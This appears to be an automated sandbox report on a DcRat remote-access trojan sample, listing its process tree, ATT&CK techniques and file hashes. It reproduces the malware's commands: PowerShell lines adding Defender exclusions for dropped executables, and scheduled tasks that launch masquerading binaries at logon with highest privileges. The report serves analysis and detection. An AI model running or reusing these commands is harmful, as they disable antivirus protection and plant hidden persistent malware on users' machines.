-
C:\Windows\system32\perfmon.exe"C:\Windows\system32\perfmon.exe" /res1⤵
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:216
-
C:\Windows\appcompat\Programs\RuntimeBroker.exeC:\Windows\appcompat\Programs\RuntimeBroker.exe1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4216 -
C:\Users\Admin\AppData\Local\SearchApp.exe"C:\Users\Admin\AppData\Local\SearchApp.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2608 -
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"3⤵
- Executes dropped EXE
PID:1516
-
-
C:\Users\Admin\AppData\Local\SearchApp.exe.exe"C:\Users\Admin\AppData\Local\SearchApp.exe.exe"3⤵
- Executes dropped EXE
PID:5012
-
-
-
C:\Windows\appcompat\Programs\RuntimeBroker.exe.exe"C:\Windows\appcompat\Programs\RuntimeBroker.exe.exe"2⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:4948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\appcompat\Programs\RuntimeBroker.exe.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providerWebFont\services.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\explorer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\unsecapp.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\csrss.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Logs\WindowsUpdate\smss.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\WaveInstaller.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\SolaraTab\msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Desktop\Idle.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:1148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Local Settings\WaveInstaller.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4840
-
-
C:\mswebFonthost\csrss.exe"C:\mswebFonthost\csrss.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:2904
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\providerWebFont\services.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\providerWebFont\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4920
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\providerWebFont\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1724
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1444
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4868
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office 15\unsecapp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\unsecapp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office 15\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\mswebFonthost\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\mswebFonthost\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3164
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\mswebFonthost\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Windows\Logs\WindowsUpdate\smss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4168
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Logs\WindowsUpdate\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:1148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Windows\Logs\WindowsUpdate\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4560
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaveInstallerW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Portable Devices\WaveInstaller.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaveInstaller" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\WaveInstaller.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2784
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaveInstallerW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Portable Devices\WaveInstaller.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\SolaraTab\msedge.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:180
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\SolaraTab\msedge.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 9 /tr "'C:\SolaraTab\msedge.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Desktop\Idle.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default\Desktop\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Desktop\Idle.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaveInstallerW" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Local Settings\WaveInstaller.exe'" /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2128
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaveInstaller" /sc ONLOGON /tr "'C:\Users\Default\Local Settings\WaveInstaller.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaveInstallerW" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Local Settings\WaveInstaller.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4204
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x49c 0x4801⤵PID:5836
-
C:\Users\Admin\AppData\Local\Temp\Temp1_processhacker-2.39-bin.zip\x64\ProcessHacker.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_processhacker-2.39-bin.zip\x64\ProcessHacker.exe"1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4608
-
C:\Users\Admin\AppData\Local\SearchApp.exeC:\Users\Admin\AppData\Local\SearchApp.exe1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3204 -
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"2⤵
- Executes dropped EXE
PID:5428
-
-
C:\Users\Admin\AppData\Local\SearchApp.exe.exe"C:\Users\Admin\AppData\Local\SearchApp.exe.exe"2⤵
- Executes dropped EXE
PID:5464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3632 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffee8fc46f8,0x7ffee8fc4708,0x7ffee8fc47182⤵PID:1136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:22⤵PID:2960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:32⤵PID:5116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:82⤵PID:5228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:3060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:12⤵PID:1000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:12⤵PID:5712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:12⤵PID:5464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 /prefetch:82⤵PID:4136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 /prefetch:82⤵PID:5796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:12⤵PID:4524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3624 /prefetch:82⤵PID:2364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5764 /prefetch:82⤵
- Modifies registry class
PID:5820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:12⤵PID:2560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:12⤵PID:5544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:12⤵PID:180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:2008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:12⤵PID:5144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:12⤵PID:2940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:12⤵PID:5420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:12⤵PID:964
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4500
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5268
-
C:\mswebFonthost\browserwinsvc.exe.exeC:\mswebFonthost\browserwinsvc.exe1⤵
- Executes dropped EXE
PID:5164
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD5a988ae6a4e9373767c6fbecd5de3a273
SHA1025cb056608ada5ea7b12b848a15e94952fbef19
SHA256c59688e693aabab39802629775e9dc38edb18a9f051f50a38d0d50962d7b908d
SHA512e249d3fa74e91bc1baff8af9b8de3e4864762bb5eed512204fed8bc0aa2189ac7a0b879786250ec4545064fb438c1e6b6485ab05d78f6aed7010f649ca676db8
-
Filesize
473B
MD5f6719687bed7403612eaed0b191eb4a9
SHA1dd03919750e45507743bd089a659e8efcefa7af1
SHA256afb514e4269594234b32c873ba2cd3cc8892e836861137b531a40a1232820c59
SHA512dd14a7eae05d90f35a055a5098d09cd2233d784f6ac228b5927925241689bff828e573b7a90a5196bfdd7aaeecf00f5c94486ad9e3910cfb07475fcfbb7f0d56
-
Filesize
984B
MD50359d5b66d73a97ce5dc9f89ed84c458
SHA1ce17e52eaac909dd63d16d93410de675d3e6ec0d
SHA256beeab2f8d3833839399dde15ce9085c17b304445577d21333e883d6db6d0b755
SHA5128fd94a098a4ab5c0fcd48c2cef2bb03328dd4d25c899bf5ed1ca561347d74a8aab8a214ba2d3180a86df72c52eb26987a44631d0ecd9edc84976c28d6c9dc16a
-
Filesize
818B
MD52916d8b51a5cc0a350d64389bc07aef6
SHA1c9d5ac416c1dd7945651bee712dbed4d158d09e1
SHA256733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04
SHA512508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74
-
Filesize
1KB
MD55ad87d95c13094fa67f25442ff521efd
SHA101f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA25667292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA5127187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3
-
Filesize
754B
MD5d2cf52aa43e18fdc87562d4c1303f46a
SHA158fb4a65fffb438630351e7cafd322579817e5e1
SHA25645e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA51254e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16
-
Filesize
771B
MD5e9dc66f98e5f7ff720bf603fff36ebc5
SHA1f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b
SHA256b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79
SHA5128027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b
-
Filesize
730B
MD5072ac9ab0c4667f8f876becedfe10ee0
SHA10227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA2562ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json
Filesize1KB
MD5d116a360376e31950428ed26eae9ffd4
SHA1192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b
SHA256c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5
SHA5125221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a
-
Filesize
802B
MD5d7c8fab641cd22d2cd30d2999cc77040
SHA1d293601583b1454ad5415260e4378217d569538e
SHA25604400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be
SHA512278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764
-
Filesize
16KB
MD5bc0c0eeede037aa152345ab1f9774e92
SHA156e0f71900f0ef8294e46757ec14c0c11ed31d4e
SHA2567a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5
SHA5125f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3
-
Filesize
780B
MD5b020de8f88eacc104c21d6e6cacc636d
SHA120b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA2563f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA5124220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38
-
Filesize
763B
MD57428aa9f83c500c4a434f8848ee23851
SHA1166b3e1c1b7d7cb7b070108876492529f546219f
SHA2561fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce
-
C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts
Filesize4KB
MD5f0bd53316e08991d94586331f9c11d97
SHA1f5a7a6dc0da46c3e077764cfb3e928c4a75d383e
SHA256dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef
SHA512fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839
-
Filesize
771B
MD51d7c74bcd1904d125f6aff37749dc069
SHA121e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab
SHA25624b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9
SHA512b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778
-
Filesize
168B
MD5db7dbbc86e432573e54dedbcc02cb4a1
SHA1cff9cfb98cff2d86b35dc680b405e8036bbbda47
SHA2567cf8a9c96f9016132be81fd89f9573566b7dc70244a28eb59d573c2fdba1def9
SHA5128f35f2e7dac250c66b209acecab836d3ecf244857b81bacebc214f0956ec108585990f23ff3f741678e371b0bee78dd50029d0af257a3bb6ab3b43df1e39f2ec
-
Filesize
133B
MD535b86e177ab52108bd9fed7425a9e34a
SHA176a1f47a10e3ab829f676838147875d75022c70c
SHA256afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319
SHA5123c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62
-
Filesize
63B
MD56de687cf7ca366429c953cb49905b70a
SHA158e2c1823c038d8da8a2f042672027184066279e
SHA25680d02a1cb8e68ffbc609a6c4914600604153ce929d46994200f837d354a5a611
